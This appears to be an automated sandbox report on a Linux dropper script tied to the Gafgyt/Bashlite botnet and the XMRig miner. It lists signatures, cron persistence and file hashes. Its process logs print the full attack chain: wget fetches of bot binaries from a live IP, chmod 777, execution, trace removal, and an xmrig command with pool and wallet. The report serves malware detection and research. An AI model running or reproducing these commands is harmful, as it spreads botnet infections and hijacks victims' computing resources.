Analysis Overview
SHA256
5f52ba20358d35d9705d4893c2e28bf333f9920d13053b21352be4a1fa6c8199
Threat Level: Known bad
The file tyo2831qq.sh was found to be: Known bad.
Malicious Activity Summary
xmrig
Xmrig_linux family
XMRig Miner payload
Xmrig family
Detected Gafgyt variant
Gafgyt family
Gafgyt/Bashlite
Executes dropped EXE
File and Directory Permissions Modification
Creates/modifies Cron job
Legitimate hosting services abused for malware hosting/C2
Reads system routing table
Writes file to system bin folder
Reads system network configuration
Reads runtime system information
Writes file to tmp directory
System Network Configuration Discovery
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-09 04:09
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-09 04:09
Reported
2024-11-09 04:11
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
95s
Max time network
128s
Command Line
Signatures
Detected Gafgyt variant
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Gafgyt family
Gafgyt/Bashlite
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/bots | /tmp/bots | N/A |
| N/A | /tmp/fileibWhol | /tmp/fileibWhol | N/A |
| N/A | /tmp/filebGBbym | /tmp/filebGBbym | N/A |
| N/A | /tmp/filedQZH4W | /tmp/filedQZH4W | N/A |
| N/A | /tmp/fileIZmINp | /tmp/fileIZmINp | N/A |
| N/A | /tmp/fileyOeFL0 | /tmp/fileyOeFL0 | N/A |
| N/A | /tmp/filelEGrRt | /tmp/filelEGrRt | N/A |
| N/A | /tmp/fileNiUUx5 | /tmp/fileNiUUx5 | N/A |
| N/A | /tmp/file2WqZIz | /tmp/file2WqZIz | N/A |
| N/A | /tmp/fileD5R9Xa | /tmp/fileD5R9Xa | N/A |
| N/A | /tmp/fileGhyk4A | /tmp/fileGhyk4A | N/A |
| N/A | /tmp/filel8AkDc | /tmp/filel8AkDc | N/A |
| N/A | /tmp/fileCSmOoG | /tmp/fileCSmOoG | N/A |
| N/A | /tmp/fileVJaGhi | /tmp/fileVJaGhi | N/A |
| N/A | /tmp/fileGF37SJ | /tmp/fileGF37SJ | N/A |
| N/A | /tmp/fileoIRPGl | /tmp/fileoIRPGl | N/A |
| N/A | /tmp/fileoAru1O | /tmp/fileoAru1O | N/A |
| N/A | /tmp/fileDaBA4r | /tmp/fileDaBA4r | N/A |
| N/A | /tmp/filedLbafW | /tmp/filedLbafW | N/A |
| N/A | /tmp/file3O8iBx | /tmp/file3O8iBx | N/A |
| N/A | /tmp/fileAOvPk1 | /tmp/fileAOvPk1 | N/A |
| N/A | /tmp/fileCwJsFC | /tmp/fileCwJsFC | N/A |
| N/A | /tmp/fileyEYfs5 | /tmp/fileyEYfs5 | N/A |
| N/A | /tmp/fileueaHmH | /tmp/fileueaHmH | N/A |
| N/A | /tmp/fileH1vC07 | /tmp/fileH1vC07 | N/A |
| N/A | /tmp/filem6VSkI | /tmp/filem6VSkI | N/A |
| N/A | /tmp/fileh2Azrd | /tmp/fileh2Azrd | N/A |
| N/A | /tmp/filexXoNQO | /tmp/filexXoNQO | N/A |
| N/A | /tmp/fileOf8Bu8 | /tmp/fileOf8Bu8 | N/A |
| N/A | /tmp/file4hnC0J | /tmp/file4hnC0J | N/A |
| N/A | /tmp/fileI7IdvX | /tmp/fileI7IdvX | N/A |
| N/A | /tmp/fileQoM44m | /tmp/fileQoM44m | N/A |
| N/A | /tmp/fileLoiThM | /tmp/fileLoiThM | N/A |
| N/A | /tmp/fileUnYIGZ | /tmp/fileUnYIGZ | N/A |
| N/A | /tmp/filevfTFbq | /tmp/filevfTFbq | N/A |
| N/A | /tmp/file3rmi0O | /tmp/file3rmi0O | N/A |
| N/A | /tmp/filedOlYi6 | /tmp/filedOlYi6 | N/A |
| N/A | /tmp/fileFw29Lt | /tmp/fileFw29Lt | N/A |
| N/A | /tmp/fileyKTYD6 | /tmp/fileyKTYD6 | N/A |
| N/A | /tmp/filenm6bft | /tmp/filenm6bft | N/A |
| N/A | /tmp/fileJtGkIU | /tmp/fileJtGkIU | N/A |
| N/A | /tmp/fileouKtFj | /tmp/fileouKtFj | N/A |
| N/A | /tmp/filewTNYwB | /tmp/filewTNYwB | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileD5R9Xa | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileVJaGhi | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileoIRPGl | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/file3rmi0O | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filedOlYi6 | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/tyo2831qq.x86 | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filedQZH4W | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileNiUUx5 | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileCSmOoG | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileAOvPk1 | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileUnYIGZ | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileibWhol | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileCwJsFC | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filem6VSkI | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileI7IdvX | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileLoiThM | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filevfTFbq | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filenm6bft | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filebGBbym | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filedLbafW | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileueaHmH | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileyKTYD6 | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileyOeFL0 | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/file2WqZIz | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filel8AkDc | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileGF37SJ | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileDaBA4r | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileh2Azrd | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/file4hnC0J | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileJtGkIU | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filelEGrRt | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileoAru1O | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/file3O8iBx | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileQoM44m | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileouKtFj | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileIZmINp | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileGhyk4A | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileyEYfs5 | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileH1vC07 | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filexXoNQO | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileFw29Lt | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileOf8Bu8 | N/A |
Reads system routing table
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/tyo2831qq.i586 | N/A |
Writes file to system bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /bin/ls | /tmp/tyo2831qq.x86 | N/A |
Reads system network configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/tyo2831qq.i586 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/exe | /tmp/file2WqZIz | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileD5R9Xa | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileVJaGhi | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileoAru1O | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileCwJsFC | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileyEYfs5 | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileQoM44m | N/A |
| File opened for reading | /proc/self/exe | /tmp/filebGBbym | N/A |
| File opened for reading | /proc/self/exe | /tmp/filelEGrRt | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileueaHmH | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileH1vC07 | N/A |
| File opened for reading | /proc/self/exe | /tmp/file4hnC0J | N/A |
| File opened for reading | /proc/self/exe | /tmp/tyo2831qq.x86 | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileibWhol | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileAOvPk1 | N/A |
| File opened for reading | /proc/self/exe | /tmp/filem6VSkI | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileI7IdvX | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileLoiThM | N/A |
| File opened for reading | /proc/self/exe | /tmp/file3rmi0O | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileJtGkIU | N/A |
| File opened for reading | /proc/self/exe | /tmp/filel8AkDc | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileGF37SJ | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileh2Azrd | N/A |
| File opened for reading | /proc/self/exe | /tmp/filexXoNQO | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileFw29Lt | N/A |
| File opened for reading | /proc/self/exe | /tmp/filewTNYwB | N/A |
| File opened for reading | /proc/self/exe | /tmp/filedQZH4W | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileGhyk4A | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileDaBA4r | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileOf8Bu8 | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileCSmOoG | N/A |
| File opened for reading | /proc/self/exe | /tmp/file3O8iBx | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileUnYIGZ | N/A |
| File opened for reading | /proc/self/exe | /tmp/filedOlYi6 | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileyKTYD6 | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileIZmINp | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileyOeFL0 | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileNiUUx5 | N/A |
| File opened for reading | /proc/self/exe | /tmp/filedLbafW | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileouKtFj | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileoIRPGl | N/A |
| File opened for reading | /proc/self/exe | /tmp/filevfTFbq | N/A |
| File opened for reading | /proc/self/exe | /tmp/filenm6bft | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/tyo2831qq.mips | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/file3O8iBx | /tmp/filedLbafW | N/A |
| File opened for modification | /tmp/fileyEYfs5 | /tmp/fileCwJsFC | N/A |
| File opened for modification | /tmp/fileueaHmH | /tmp/fileyEYfs5 | N/A |
| File opened for modification | /tmp/fileOf8Bu8 | /tmp/filexXoNQO | N/A |
| File opened for modification | /tmp/tyo2831qq.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/bots | /tmp/tyo2831qq.x86 | N/A |
| File opened for modification | /tmp/fileyOeFL0 | /tmp/fileIZmINp | N/A |
| File opened for modification | /tmp/filedLbafW | /tmp/fileDaBA4r | N/A |
| File opened for modification | /tmp/filem6VSkI | /tmp/fileH1vC07 | N/A |
| File opened for modification | /tmp/fileh2Azrd | /tmp/filem6VSkI | N/A |
| File opened for modification | /tmp/bots | /usr/bin/wget | N/A |
| File opened for modification | /tmp/fileibWhol | /tmp/tyo2831qq.x86 | N/A |
| File opened for modification | /tmp/filedQZH4W | /tmp/filebGBbym | N/A |
| File opened for modification | /tmp/fileI7IdvX | /tmp/file4hnC0J | N/A |
| File opened for modification | /tmp/file3rmi0O | /tmp/filevfTFbq | N/A |
| File opened for modification | /tmp/filedOlYi6 | /tmp/file3rmi0O | N/A |
| File opened for modification | /tmp/filewTNYwB | /tmp/fileouKtFj | N/A |
| File opened for modification | /tmp/tyo2831qq.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/filelEGrRt | /tmp/fileyOeFL0 | N/A |
| File opened for modification | /tmp/fileVJaGhi | /tmp/fileCSmOoG | N/A |
| File opened for modification | /tmp/fileoAru1O | /tmp/fileoIRPGl | N/A |
| File opened for modification | /tmp/fileDaBA4r | /tmp/fileoAru1O | N/A |
| File opened for modification | /tmp/tyo2831qq.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/fileIZmINp | /tmp/filedQZH4W | N/A |
| File opened for modification | /tmp/filel8AkDc | /tmp/fileGhyk4A | N/A |
| File opened for modification | /tmp/fileGF37SJ | /tmp/fileVJaGhi | N/A |
| File opened for modification | /tmp/fileAOvPk1 | /tmp/file3O8iBx | N/A |
| File opened for modification | /tmp/fileH1vC07 | /tmp/fileueaHmH | N/A |
| File opened for modification | /tmp/file4hnC0J | /tmp/fileOf8Bu8 | N/A |
| File opened for modification | /tmp/filekKP7GW | /tmp/fileFw29Lt | N/A |
| File opened for modification | /tmp/fileJtGkIU | /tmp/filenm6bft | N/A |
| File opened for modification | /tmp/fileX9kSc0 | /tmp/filewTNYwB | N/A |
| File opened for modification | /tmp/tyo2831qq.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/filebGBbym | /tmp/fileibWhol | N/A |
| File opened for modification | /tmp/fileNiUUx5 | /tmp/filelEGrRt | N/A |
| File opened for modification | /tmp/fileCSmOoG | /tmp/filel8AkDc | N/A |
| File opened for modification | /tmp/fileoIRPGl | /tmp/fileGF37SJ | N/A |
| File opened for modification | /tmp/filevfTFbq | /tmp/fileUnYIGZ | N/A |
| File opened for modification | /tmp/file2WqZIz | /tmp/fileNiUUx5 | N/A |
| File opened for modification | /tmp/filexXoNQO | /tmp/fileh2Azrd | N/A |
| File opened for modification | /tmp/fileQoM44m | /tmp/fileI7IdvX | N/A |
| File opened for modification | /tmp/fileLoiThM | /tmp/fileQoM44m | N/A |
| File opened for modification | /tmp/fileUnYIGZ | /tmp/fileLoiThM | N/A |
| File opened for modification | /tmp/fileFw29Lt | /tmp/filedOlYi6 | N/A |
| File opened for modification | /tmp/tyo2831qq.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/fileD5R9Xa | /tmp/file2WqZIz | N/A |
| File opened for modification | /tmp/fileGhyk4A | /tmp/fileD5R9Xa | N/A |
| File opened for modification | /tmp/fileCwJsFC | /tmp/fileAOvPk1 | N/A |
| File opened for modification | /tmp/filenm6bft | /tmp/fileyKTYD6 | N/A |
| File opened for modification | /tmp/fileouKtFj | /tmp/fileJtGkIU | N/A |
| File opened for modification | /tmp/tyo2831qq.arm6 | /usr/bin/wget | N/A |
Processes
/tmp/tyo2831qq.sh
[/tmp/tyo2831qq.sh]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.mips]
/bin/chmod
[chmod 777 tyo2831qq.mips]
/tmp/tyo2831qq.mips
[./tyo2831qq.mips]
/usr/bin/wget
[wget http://31.172.80.237/bots]
/bin/chmod
[chmod 777 bots]
/tmp/bots
[./bots]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.mpsl]
/bin/chmod
[chmod 777 tyo2831qq.mpsl]
/tmp/tyo2831qq.mpsl
[./tyo2831qq.mpsl]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.sh4]
/bin/chmod
[chmod 777 tyo2831qq.sh4]
/tmp/tyo2831qq.sh4
[./tyo2831qq.sh4]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.x86]
/bin/chmod
[chmod 777 tyo2831qq.x86]
/tmp/tyo2831qq.x86
[./tyo2831qq.x86]
/tmp/fileibWhol
[./tyo2831qq.x86]
/tmp/filebGBbym
[./tyo2831qq.x86]
/tmp/filedQZH4W
[./tyo2831qq.x86]
/tmp/fileIZmINp
[./tyo2831qq.x86]
/tmp/fileyOeFL0
[./tyo2831qq.x86]
/tmp/filelEGrRt
[./tyo2831qq.x86]
/tmp/fileNiUUx5
[./tyo2831qq.x86]
/tmp/file2WqZIz
[./tyo2831qq.x86]
/tmp/fileD5R9Xa
[./tyo2831qq.x86]
/tmp/fileGhyk4A
[./tyo2831qq.x86]
/tmp/filel8AkDc
[./tyo2831qq.x86]
/tmp/fileCSmOoG
[./tyo2831qq.x86]
/tmp/fileVJaGhi
[./tyo2831qq.x86]
/tmp/fileGF37SJ
[./tyo2831qq.x86]
/tmp/fileoIRPGl
[./tyo2831qq.x86]
/tmp/fileoAru1O
[./tyo2831qq.x86]
/tmp/fileDaBA4r
[./tyo2831qq.x86]
/tmp/filedLbafW
[./tyo2831qq.x86]
/tmp/file3O8iBx
[./tyo2831qq.x86]
/tmp/fileAOvPk1
[./tyo2831qq.x86]
/tmp/fileCwJsFC
[./tyo2831qq.x86]
/tmp/fileyEYfs5
[./tyo2831qq.x86]
/tmp/fileueaHmH
[./tyo2831qq.x86]
/tmp/fileH1vC07
[./tyo2831qq.x86]
/tmp/filem6VSkI
[./tyo2831qq.x86]
/tmp/fileh2Azrd
[./tyo2831qq.x86]
/tmp/filexXoNQO
[./tyo2831qq.x86]
/tmp/fileOf8Bu8
[./tyo2831qq.x86]
/tmp/file4hnC0J
[./tyo2831qq.x86]
/tmp/fileI7IdvX
[./tyo2831qq.x86]
/tmp/fileQoM44m
[./tyo2831qq.x86]
/tmp/fileLoiThM
[./tyo2831qq.x86]
/tmp/fileUnYIGZ
[./tyo2831qq.x86]
/tmp/filevfTFbq
[./tyo2831qq.x86]
/tmp/file3rmi0O
[./tyo2831qq.x86]
/tmp/filedOlYi6
[./tyo2831qq.x86]
/tmp/fileFw29Lt
[./tyo2831qq.x86]
/tmp/fileyKTYD6
[./tyo2831qq.x86]
/tmp/filenm6bft
[./tyo2831qq.x86]
/tmp/fileJtGkIU
[./tyo2831qq.x86]
/tmp/fileouKtFj
[./tyo2831qq.x86]
/tmp/filewTNYwB
[./tyo2831qq.x86]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.arm6]
/bin/chmod
[chmod 777 tyo2831qq.arm6]
/tmp/tyo2831qq.arm6
[./tyo2831qq.arm6]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.x32]
/bin/chmod
[chmod 777 tyo2831qq.i586]
/tmp/tyo2831qq.i586
[./tyo2831qq.i586]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.m68k]
/bin/chmod
[chmod 777 tyo2831qq.m68k]
/tmp/tyo2831qq.m68k
[./tyo2831qq.m68k]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.spc]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.arm4]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.arm7]
/bin/chmod
[chmod 777 tyo2831qq.arm7]
/tmp/tyo2831qq.arm7
[./tyo2831qq.arm7]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.arm5]
/bin/rm
[rm -rf tyo2831qq.arm6 tyo2831qq.arm7 tyo2831qq.i586 tyo2831qq.m68k tyo2831qq.mips tyo2831qq.mpsl tyo2831qq.ppc tyo2831qq.sh tyo2831qq.sh4 tyo2831qq.x32 tyo2831qq.x86]
/usr/bin/wget
[wget https://github.com/m3Mastika/Dockerfile/raw/refs/heads/main/xmrig]
/bin/chmod
[chmod 777 xmrig]
/tmp/xmrig
[./xmrig --url pool.hashvault.pro:80 --user 48mn9hwNxkfjYAppkEaghU1pRbaThMVmnFHuQT44TTDRLLaUsDNCyWDStDZ5DjUqyLaiaywMirbPp1y1zPiVgCeV35ENMV7 --pass bos -B]
Network
| Country | Destination | Domain | Proto |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| GB | 89.187.167.3:443 | tcp | |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:706 | tcp | |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:706 | tcp | |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| US | 1.1.1.1:53 | github.com | udp |
| US | 1.1.1.1:53 | github.com | udp |
Files
/tmp/bots
| MD5 | 2615e32f9e7b42b36ba1f3dd6f8f7e3c |
| SHA1 | 4286d999a1a76da1e68cb227e01de237ef5fcf68 |
| SHA256 | e9bc9d0324b4943e9a9419c9be202331efe86a055768286b45a6ff80eb172078 |
| SHA512 | b9e21c618c03d111405f5d0e33d08a9bbe37ec6361773f02fde806a2cd784355cc43c64bce22ceeabc2a2e69f277989a26501085c6df725b8bccd9b52ce4ff78 |
/tmp/fileibWhol
| MD5 | a8a6992775589faecef1bc8cf38bdfc5 |
| SHA1 | b6903301aecf34539654f309b8c12773461920dc |
| SHA256 | cae053bfac71081a19bd64ae66f3fc9a149bcbe492eeb46d33647e01ab18eb52 |
| SHA512 | dd803894a1bb9caa2bb4d1da70d35a531a7f76718d23392ff7ee511f489f413f2c79e82a3d7432685a36f470b69c74d211d18d050bee1a5d261c75131ee58fb8 |
/etc/cron.hourly/0
| MD5 | 3f006f7f81fc17be7f4a0d3da0fad5de |
| SHA1 | 97a94d3d0654c6551057af3809b52572bd7f9f5d |
| SHA256 | 982f9e0f089b91ba79df723435099df15c72e1201a45010ee60226ab136c93bf |
| SHA512 | 97d2ac0057427b940ada7c0fc805c1966e2535c3c3767ca85fef4a7e0fdc9d4ef9eb133530408b1e439df067881cb317e948ad9bfd487e958a04c97d9db978e0 |
/tmp/fileibWhol
| MD5 | 4ac062e7bafef554949de20763c54f7b |
| SHA1 | 24355a299d9aca3953a9fac256cdaf7be0249fda |
| SHA256 | 33368eb166229b262cb964cfa6412478278b2a23e5f0c3de24a56c28dac5eeb0 |
| SHA512 | b12f82c346dbe62b6a96e7c9d3185eb2fdca9cc29ba83e29a102fd746c93d72d919d8146840ab9338dc8a25a7fb2b400a0cd9d0ac2ea5a0471d283f81d115bb9 |
/tmp/bots
| MD5 | b0f19b181c8d6961d1fed5bda4def843 |
| SHA1 | 6e00805b0e6204b1d0c249550567a385e2835226 |
| SHA256 | f4893c325586305fa20901ae1fa6059cc0fac29c57e915a2c6f79c99bb9b9bf7 |
| SHA512 | 997cec78ea201ea7aafc17178dad49193832807971e2f56cbed487a17f1fb287f585f1022613e32ac70c0eac89ca9c253e4e860a2aa23589dc733fe8f8c94e9a |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-09 04:09
Reported
2024-11-09 04:11
Platform
debian9-armhf-20240418-en
Max time kernel
95s
Max time network
96s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/bots | /tmp/bots | N/A |
Reads system routing table
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/tyo2831qq.arm7 | N/A |
| File opened for reading | /proc/net/route | /tmp/tyo2831qq.arm6 | N/A |
| File opened for reading | /proc/net/route | /tmp/tyo2831qq.ppc | N/A |
Reads system network configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/tyo2831qq.ppc | N/A |
| File opened for reading | /proc/net/route | /tmp/tyo2831qq.arm7 | N/A |
| File opened for reading | /proc/net/route | /tmp/tyo2831qq.arm6 | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/tyo2831qq.mips | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/tyo2831qq.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.i586 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.x32 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/bots | /usr/bin/wget | N/A |
Processes
/tmp/tyo2831qq.sh
[/tmp/tyo2831qq.sh]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.mips]
/bin/chmod
[chmod 777 tyo2831qq.mips]
/tmp/tyo2831qq.mips
[./tyo2831qq.mips]
/usr/bin/wget
[wget http://31.172.80.237/bots]
/bin/chmod
[chmod 777 bots]
/tmp/bots
[./bots]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.mpsl]
/bin/chmod
[chmod 777 tyo2831qq.mpsl]
/tmp/tyo2831qq.mpsl
[./tyo2831qq.mpsl]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.sh4]
/bin/chmod
[chmod 777 tyo2831qq.sh4]
/tmp/tyo2831qq.sh4
[./tyo2831qq.sh4]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.x86]
/bin/chmod
[chmod 777 tyo2831qq.x86]
/tmp/tyo2831qq.x86
[./tyo2831qq.x86]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.arm6]
/bin/chmod
[chmod 777 tyo2831qq.arm6]
/tmp/tyo2831qq.arm6
[./tyo2831qq.arm6]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.x32]
/bin/chmod
[chmod 777 tyo2831qq.x32]
/tmp/tyo2831qq.x32
[./tyo2831qq.x32]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.ppc]
/bin/chmod
[chmod 777 tyo2831qq.ppc]
/tmp/tyo2831qq.ppc
[./tyo2831qq.ppc]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.i586]
/bin/chmod
[chmod 777 tyo2831qq.i586]
/tmp/tyo2831qq.i586
[./tyo2831qq.i586]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.m68k]
/bin/chmod
[chmod 777 tyo2831qq.m68k]
/tmp/tyo2831qq.m68k
[./tyo2831qq.m68k]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.spc]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.arm4]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.arm7]
/bin/chmod
[chmod 777 tyo2831qq.arm7]
/tmp/tyo2831qq.arm7
[./tyo2831qq.arm7]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.arm5]
/bin/rm
[rm -rf tyo2831qq.arm6 tyo2831qq.arm7 tyo2831qq.i586 tyo2831qq.m68k tyo2831qq.mips tyo2831qq.mpsl tyo2831qq.ppc tyo2831qq.sh tyo2831qq.sh4 tyo2831qq.x32 tyo2831qq.x86]
/usr/bin/wget
[wget https://github.com/m3Mastika/Dockerfile/raw/refs/heads/main/xmrig]
/bin/chmod
[chmod 777 xmrig]
/tmp/xmrig
